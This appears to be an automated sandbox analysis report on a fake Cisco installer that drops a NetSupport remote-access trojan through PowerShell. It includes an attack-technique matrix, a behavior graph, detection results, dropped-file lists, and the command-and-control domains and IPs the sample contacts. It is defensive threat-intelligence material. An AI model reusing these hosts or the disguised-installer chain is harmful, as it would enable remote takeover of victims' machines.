                                  Valid Accounts                                  		2
                                  Valid Accounts                                  		11
                                  Software Packing                                  		Security Account Manager1
                                  System Service Discovery                                  		SMB/Windows Admin Shares1
                                  Input Capture                                  		3
                                  Non-Application Layer Protocol                                  		Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts2
                                  PowerShell                                  		11
                                  Registry Run Keys / Startup Folder                                  		21
                                  Access Token Manipulation                                  		1
                                  DLL Side-Loading                                  		NTDS3
                                  File and Directory Discovery                                  		Distributed Component Object Model3
                                  Clipboard Data                                  		4
                                  Application Layer Protocol                                  		Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                                  Process Injection                                  		1
                                  DLL Search Order Hijacking                                  		LSA Secrets1
                                  Network Sniffing                                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                                  Registry Run Keys / Startup Folder                                  		2
                                  Masquerading                                  		Cached Domain Credentials33
                                  System Information Discovery                                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                                  Valid Accounts                                  		DCSync151
                                  Security Software Discovery                                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                                  Virtualization/Sandbox Evasion                                  		Proc Filesystem2
                                  Process Discovery                                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                  Access Token Manipulation                                  		/etc/passwd and /etc/shadow31
                                  Virtualization/Sandbox Evasion                                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                                  Process Injection                                  		Network Sniffing11
                                  Application Window Discovery                                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture3
                                  System Owner/User Discovery                                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546660 Sample: CiscoSetup.exe Startdate: 01/11/2024 Architecture: WINDOWS Score: 54 48 payiki.com 2->48 50 anyhowdo.com 2->50 52 geo.netsupportsoftware.com 2->52 62 Suricata IDS alerts for network traffic 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 Sigma detected: Powershell drops NetSupport RAT client 2->66 68 4 other signatures 2->68 9 CiscoSetup.exe 2 2->9         started        12 client32.exe 2->12         started        14 client32.exe 2->14         started        signatures3 process4 file5 46 C:\Users\user\AppData\...\CiscoSetup.tmp, PE32 9->46 dropped 16 CiscoSetup.tmp 25 346 9->16         started        process6 file7 30 C:\Users\user\AppData\Local\...\cispn.ps1, ASCII 16->30 dropped 32 C:\Program Files (x86)\Cisco\unins000.dat, InnoSetup 16->32 dropped 34 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 16->34 dropped 36 96 other files (none is malicious) 16->36 dropped 60 Bypasses PowerShell execution policy 16->60 20 powershell.exe 1 52 16->20         started        signatures8 process9 file10 38 C:\Users\user\AppData\...\remcmdstub.exe, PE32 20->38 dropped 40 C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32 20->40 dropped 42 C:\Users\user\AppData\...\client32.exe, PE32 20->42 dropped 44 7 other files (6 malicious) 20->44 dropped 70 Found suspicious powershell code related to unpacking or dynamic code loading 20->70 72 Loading BitLocker PowerShell Module 20->72 74 Powershell drops PE file 20->74 24 client32.exe 17 20->24         started        28 conhost.exe 20->28         started        signatures11 process12 dnsIp13 54 anyhowdo.com 199.188.200.195, 443, 60707 NAMECHEAP-NETUS United States 24->54 56 payiki.com 151.236.16.15, 443, 60703 HVC-ASUS European Union 24->56 58 geo.netsupportsoftware.com 104.26.1.231, 60710, 80 CLOUDFLARENETUS United States 24->58 76 Contains functionalty to change the wallpaper 24->76 78 Contains functionality to detect sleep reduction / modifications 24->78 signatures14

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand

                                  Antivirus, Machine Learning and Genetic Malware Detection

                                  Initial Sample

                                  SourceDetectionScannerLabelLink
                                  CiscoSetup.exe0%ReversingLabs

                                  Dropped Files

                                  SourceDetectionScannerLabelLink
                                  C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\is-Q7F68.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper64.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\acdownloader.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\is-96AL6.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\ProxyCon.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui_toast.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-8OL4N.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\is-T4BIJ.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\csc_ui_setup.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\is-T9GPQ.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui_toast.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-1KC0P.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-RN0PK.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\Uninstall.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\VACon64.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\WebView2Loader.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\ac_sock_fltr_api.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscocrypto.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\acciscossl.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\accurl.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\acextwebhelper.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\acfeedback.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\acruntime.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\acsock64.sys (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_chrono.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_date_time.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_filesystem.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_system.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_thread.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\cfom.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\concrt140.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-0CFDM.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-1N4FB.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2J155.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2TJID.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3JN2R.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3NCDE.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3VFI6.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-50H6H.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-53P9C.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-5J2U6.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-7ITNQ.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-8761D.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-91CSN.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-970AL.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-98QQL.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D0HIO.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-D2T5K.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-EUMLH.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-H5812.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-I704D.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KHO2L.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KLEUG.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MGVA1.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MKOUV.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MMI8M.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-N98KR.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-O18K3.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-OJMRD.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-OTMTE.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-P9NEN.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q2D0Q.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q7D23.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-RDO3H.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-S996S.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-S9VDU.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-SINFC.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-UM1NO.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-URJD8.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-V8S0O.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\is-VTDA9.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_1.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_2.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vccorlib140.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vcruntime140.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagent.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnagentutilities.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapi.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapishim.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncli.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommon.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncommoncrypt.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpndownloader.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnipsec.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnmgmttun.exe (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnva64-6.sys (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\Cisco Secure Client\zlib1.dll (copy)0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\is-VTFF8.tmp0%ReversingLabs
                                  C:\Program Files (x86)\Cisco\unins000.exe (copy)0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-S9GUG.tmp\_isetup\_setup64.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Roaming\Cisco\AudioCapture.dll3%ReversingLabs

                                  Unpacked PE Files

                                  No Antivirus matches

                                  Domains

                                  No Antivirus matches

                                  URLs

                                  SourceDetectionScannerLabelLink
                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                                  http://ocsp.sectigo.com00%URL Reputationsafe
                                  http://crl.microsoft0%URL Reputationsafe
                                  https://contoso.com/License0%URL Reputationsafe
                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                                  http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
                                  https://aka.ms/pscore6lB0%URL Reputationsafe
                                  https://www.remobjects.com/ps0%URL Reputationsafe
                                  https://contoso.com/0%URL Reputationsafe
                                  https://nuget.org/nuget.exe0%URL Reputationsafe
                                  https://www.innosetup.com/0%URL Reputationsafe
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                                  https://sectigo.com/CPS00%URL Reputationsafe
                                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                                  http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                                  http://ocsp.thawte.com00%URL Reputationsafe
                                  https://contoso.com/Icon0%URL Reputationsafe
                                  http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                                  http://www.microsoft.0%URL Reputationsafe
                                  http://www.symauth.com/cps0(0%URL Reputationsafe
                                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                                  http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
                                  http://www.symauth.com/rpa000%URL Reputationsafe
                                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                                  http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe

                                  Domains and IPs

                                  Contacted Domains

                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  payiki.com
                                  		151.236.16.15
                                  		truetrue
                                    		unknown
                                    geo.netsupportsoftware.com
                                    		104.26.1.231
                                    		truefalse
                                      		unknown
                                      anyhowdo.com
                                      		199.188.200.195
                                      		truetrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://151.236.16.15/fakeurl.htmtrue
                                          		unknown
                                          http://geo.netsupportsoftware.com/location/loca.aspfalse
                                            		unknown
                                            http://199.188.200.195/fakeurl.htmtrue
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://www.netsupportsoftware.compowershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.drfalse
                                                		unknown
                                                https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUCiscoSetup.exefalse
                                                  		unknown
                                                  http://%s/testpage.htmwininet.dllpowershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                    		unknown
                                                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)client32.exe, 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                      		unknown
                                                      http://ocsp.sectigo.com0powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.pci.co.uk/supportsupportclient32.exe, 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497690917.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579319799.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                        		unknown
                                                        http://crl.microsoftpowershell.exe, 00000004.00000002.2458265497.000000000756A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.microsoft.copowershell.exe, 00000004.00000002.2463153795.00000000084F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://contoso.com/Licensepowershell.exe, 00000004.00000002.2425908561.00000000064A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://127.0.0.1RESUMEPRINTINGclient32.exe, 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497655081.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579273114.000000001118F000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                            		unknown
                                                            http://%s/testpage.htmpowershell.exe, 00000004.00000002.2411285654.0000000005089000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                              		unknown
                                                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://geo.netsupportsoftware.com/location/loca.aspTclient32.exe, 00000006.00000002.4598217115.0000000005101000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.2705520820.00000000050FF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.2415445587.0000000005101000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://www.immunet.comVoorCiscoSetup.tmp, 00000002.00000003.2522959977.0000000005750000.00000004.00001000.00020000.00000000.sdmp, is-RVLAV.tmp.2.drfalse
                                                                  		unknown
                                                                  https://www.openssl.org/is-VTDA9.tmp.2.drfalse
                                                                    		unknown
                                                                    http://%s/fakeurl.htmclient32.exe, client32.exe, 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                      		unknown
                                                                      https://curl.se/docs/hsts.htmlis-2J155.tmp.2.drfalse
                                                                        		unknown
                                                                        https://www.immunet.com.Umis-KOKH0.tmp.2.drfalse
                                                                          		unknown
                                                                          http://crl.thawte.com/ThawteTimestampingCA.crl0powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2411285654.0000000004A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://www.remobjects.com/psCiscoSetup.exe, 00000000.00000003.2131548415.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.exe, 00000000.00000003.2132065973.000000007F29B000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000002.00000000.2133732042.0000000000C71000.00000020.00000001.01000000.00000004.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://contoso.com/powershell.exe, 00000004.00000002.2425908561.00000000064A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2425908561.00000000064A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://www.innosetup.com/CiscoSetup.exe, 00000000.00000003.2131548415.00000000035C0000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.exe, 00000000.00000003.2132065973.000000007F29B000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000002.00000000.2133732042.0000000000C71000.00000020.00000001.01000000.00000004.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://sectigo.com/CPS0Dpowershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://www.netsupportschool.com/tutor-assistant.asp11(client32.exe, 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497690917.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579319799.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                              		unknown
                                                                              https://www.iminunet.comParaCiscoSetup.tmp, 00000002.00000003.2522959977.0000000005750000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2411285654.0000000004A41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.netsupportschool.com/tutor-assistant.aspclient32.exe, 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497690917.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579319799.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                                  		unknown
                                                                                  https://www.cisco.comCiscoSetup.exe, 00000000.00000003.2546263258.0000000003123000.00000004.00001000.00020000.00000000.sdmp, CiscoSetup.tmp, 00000002.00000003.2535098758.0000000002CAC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://geo.netsupportsoftware.com/location/loca.aspnclient32.exe, 00000006.00000003.2415445587.00000000050AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2425908561.00000000064A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://www.cisco.com/c/en/us/td/docs/security/vpn_client/anyconnect/anyconnect40/user/guide/b_Androiis-V7509.tmp.2.drfalse
                                                                                        		unknown
                                                                                        http://www.pci.co.uk/supportclient32.exe, 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000009.00000002.2497690917.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2579319799.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpfalse
                                                                                          		unknown
                                                                                          https://sectigo.com/CPS0powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://curl.se/docs/http-cookies.htmlis-2J155.tmp.2.drfalse
                                                                                            		unknown
                                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.00000000053B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2411285654.0000000004B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://ocsp.thawte.com0powershell.exe, 00000004.00000002.2411285654.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004EE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmp, client32.exe.4.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://www.immunet.com.CiscoSetup.tmp, 00000002.00000003.2522959977.0000000005750000.00000004.00001000.00020000.00000000.sdmp, is-KOKH0.tmp.2.dr, is-KCJJQ.tmp.2.drfalse
                                                                                                		unknown
                                                                                                https://contoso.com/Iconpowershell.exe, 00000004.00000002.2425908561.00000000064A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#powershell.exe, 00000004.00000002.2411285654.0000000004F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
